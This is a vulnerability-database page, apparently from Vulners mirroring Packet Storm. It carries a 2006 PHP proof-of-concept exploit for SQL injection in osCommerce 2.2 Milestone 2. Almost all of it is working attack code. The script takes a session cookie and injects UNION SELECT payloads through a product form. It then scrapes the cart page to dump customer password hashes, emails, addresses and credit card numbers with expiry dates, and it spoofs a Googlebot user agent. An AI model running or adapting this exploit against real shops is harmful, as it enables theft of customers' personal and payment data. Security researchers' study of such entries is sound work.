Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

oscommerce22-php.txt

🗓️ 07 Sep 2006 00:00:00Reported by PerseusType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

php poc exploit for osCommerce <= 2.2 Milestone 2 060817 vuln found by gulftech for sql injection. Education use only

Show more
Code
`php poc exploit for osCommerce <= 2.2 Milestone 2  
060817 vuln found by gulftech  
  
it does not work with magic_quotes_gpc on so make it  
off to test this script. you're lucky if you can find  
server with this settings set to off.  
  
this is for education use only. topic: sql injection.  
  
kiddies use it at your own discretion.  
  
#!/usr/bin/php -q -d short_open_tag=on  
<?  
  
error_reporting(0);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout",5);  
  
if ($argc<5) {  
echo "\r\nExploit osCommerce < 2.2 Milestone 2 060817  
by Perseus \r\n";  
echo "\r\nUsage: \r\n\r\n php ".$argv[0]." host path  
product_id whatinfo OPTIONS\r\n\r\n";  
echo " host - target server (ip/hostname)\r\n";  
echo " path - path to osCommerce\r\n";  
echo " product_id - Valid product_id\r\n";  
echo " whatinfo - pass for password, cc for credit  
card info, addr for address\r\n\r\n";  
echo "Options:\r\n\r\n";  
echo " -D: Show debug or verbose on\r\n";  
echo " -p[port]: specify a port other than 80\r\n";  
echo " -P[ip:port]: specify a proxy\r\n\r\n";  
echo "Example:\r\n\r\n";  
echo " php ".$argv[0]." localhost /os2/catalog/ 2  
pass\r\n";  
echo " php ".$argv[0]." 192.168.1.108 /os2/catalog/  
2 pass -p8080 -P192.168.1.108:3128 -D\r\n";  
echo " php ".$argv[0]." 192.168.1.108 /os2/catalog/  
2 cc -p8080 -P192.168.1.108:3128\r\n";  
die;  
}  
  
  
$host=$argv[1];  
$path=$argv[2];  
$products_id=$argv[3];  
$whatinfo=$argv[4];  
$port=80;  
$Debug=0;  
$proxy="";  
for ($i=5; $i<=$argc-1; $i++){  
$temp=$argv[$i][0].$argv[$i][1];  
if ($temp=="-p")  
{  
$port=str_replace("-p","",$argv[$i]);  
}  
if ($temp=="-P")  
{  
$proxy=str_replace("-P","",$argv[$i]);  
}  
if ($temp=="-D")  
{  
$tmp=str_replace("-D","",$argv[$i]);  
$Debug=1;  
}  
}  
  
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))  
{echo 'Error... check the path!'; die;}  
  
if($Debug==1) {  
echo "Name\t: osCommerce Multiple  
Vulnerabilities\r\n";  
echo "Date\t: August 17, 2006\r\n";  
echo "Vendor\t: osCommerce\r\n";  
echo "URL\t: http://www.oscommerce.com/\r\n";  
echo "Version\t: osCommerce < 2.2 Milestone 2  
060817\r\n";  
echo "Risk\t: Multiple Vulnerabilities\r\n";  
echo "Exploit\t: Customers Info, Pass, and Credit  
Info Disclosure\r\n";  
echo "Author\t: Perseus\r\n";  
echo "Compatibility\t: magic_quotes_gpc off, union  
supported\r\n";  
echo "Greets\t: rgod, James Bercegay, str0ke, hdm,  
r57 \r\n";  
}  
  
// try if you can rewrite this code to attack osc with  
magic_quotes_gpc on  
// because I found it impossible for the moment.  
// this will make oscommerce people update their vuln  
servers right now.  
  
$proxy_regex =  
'(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';  
if ($proxy=='') {$p=$path;} else  
{$p='http://'.$host.':'.$port.$path;}  
$loop = 1000;  
  
function sendpacketii($packet)  
{  
global $proxy, $host, $port, $html, $proxy_regex,  
$Debug;  
if ($proxy=='') {  
if($Debug==1) echo "\r\nProcessing packets  
directly...\r\n";  
$ock=fsockopen(gethostbyname($host),$port);  
if (!$ock) {  
echo "\r\nNo response from  
".$host.":".$port."\r\n"; die;  
}  
}  
else {  
$c = preg_match($proxy_regex,$proxy);  
if (!$c) {  
echo 'Not a valid proxy...';die;  
}  
$parts=explode(':',$proxy);  
if($Debug==1) echo "\r\nProcessing packets using  
proxy ".$parts[0].":".$parts[1]." ...\r\n";  
$ock=fsockopen($parts[0],$parts[1]);  
if (!$ock) {  
echo "\r\nNo response from proxy...\r\n";die;  
}  
}  
fputs($ock,$packet);  
if ($proxy=='') {  
$html='';  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
}  
else {  
$html='';  
while ((!feof($ock)) or  
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))  
{  
$html.=fread($ock,1);  
}  
}  
  
fclose($ock);  
#debug  
#echo "\r\n".$html;  
}  
$bl=0;  
for($y=0;$y<=$loop;$y++) {  
//1. get cookie  
$out = "GET  
".$p."product_info.php?products_id=".$products_id."  
HTTP/1.1\r\n";  
$out .= "Host: ".$host."\r\n";  
$out .= "Connection: Close\r\n\r\n";  
sendpacketii($out);  
$e = explode("Set-Cookie: osCsid=",$html);  
$e2 = explode(";",$e[1]);  
$cookie = $e2[0];  
  
//2. injection  
if($whatinfo=="pass") {  
  
$sql="999' UNION SELECT 0 , CONCAT( CHAR(77),'||||',  
customers_password, '^',  
customers_email_address,'|',customers_firstname,'|',customers_lastname,'|',customers_dob,'|',customers_telephone,  
'^') , 0 , 0   
FROM customers LIMIT ".$y.",1 /*";  
  
} elseif($whatinfo=="addr") {  
  
$sql="999' UNION SELECT 0 , CONCAT( CHAR(77),'||||',  
entry_company, '^',  
entry_firstname,'|',entry_lastname,'|',entry_street_address,'|',entry_suburb,'|',entry_postcode,'|',entry_city,'|',entry_state,  
'^') , 0 , 0   
FROM address_book LIMIT ".$y.",1 /*";  
  
} elseif($whatinfo=="cc") {  
  
$sql="999' UNION SELECT 0 , CONCAT( CHAR(77),'||||',  
cc_type, '^',  
cc_owner,'|',cc_number,'|',cc_expires,'|',billing_street_address,'|',billing_suburb,'|',billing_city,'|',billing_postcode,'|',billing_state,'|',billing_country,'^')  
, 0 , 0   
FROM orders LIMIT ".$y.",1 /*";  
  
}  
  
$sql=urlencode($sql);  
$data = "id[0]=".$sql."";  
$data.="&products_id=".$products_id."";  
$out = "POST  
".$p."product_info.php?products_id=".$products_id."&action=add_product&osCsid=".$cookie."  
HTTP/1.0\r\n";  
$out .= "User-Agent: Googlebot/2.1\r\n";  
$out .= "Host: ".$host."\r\n";   
$out .= "Accept: text/plain\r\n";  
$out .= "Connection: Close\r\n";  
$out .= "Content-Type:  
application/x-www-form-urlencoded\r\n";  
$out .= "Cookie: ".$cookie."\r\n";  
$out .= "Content-Length: ".strlen($data)."\r\n\r\n";  
$out .= $data;  
sendpacketii($out);  
  
//3. get vals  
$out = "GET  
".$p."shopping_cart.php?osCsid=".$cookie."  
HTTP/1.1\r\n";  
$out .= "Host: ".$host."\r\n";  
$out .= "Connection: Close\r\n\r\n";  
sendpacketii($out);  
//echo $html;  
$e = explode("M||||",$html);  
$e2 = explode("^",$e[1]);  
$str = "\r\n".$y.". ".$e2[0]." ".$e2[1]."\r\n";   
echo $str;  
$strl = strlen($str);  
if($strl<=25) $bl++;  
if($bl==3) break;  
  
}  
  
?>  
  
__________________________________________________  
Do You Yahoo!?  
Tired of spam? Yahoo! Mail has the best spam protection around   
http://mail.yahoo.com   
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
07 Sep 2006 00:00Current
7.4High risk
Vulners AI Score7.4
oscommercesql injectiongulftech
29
.json
Report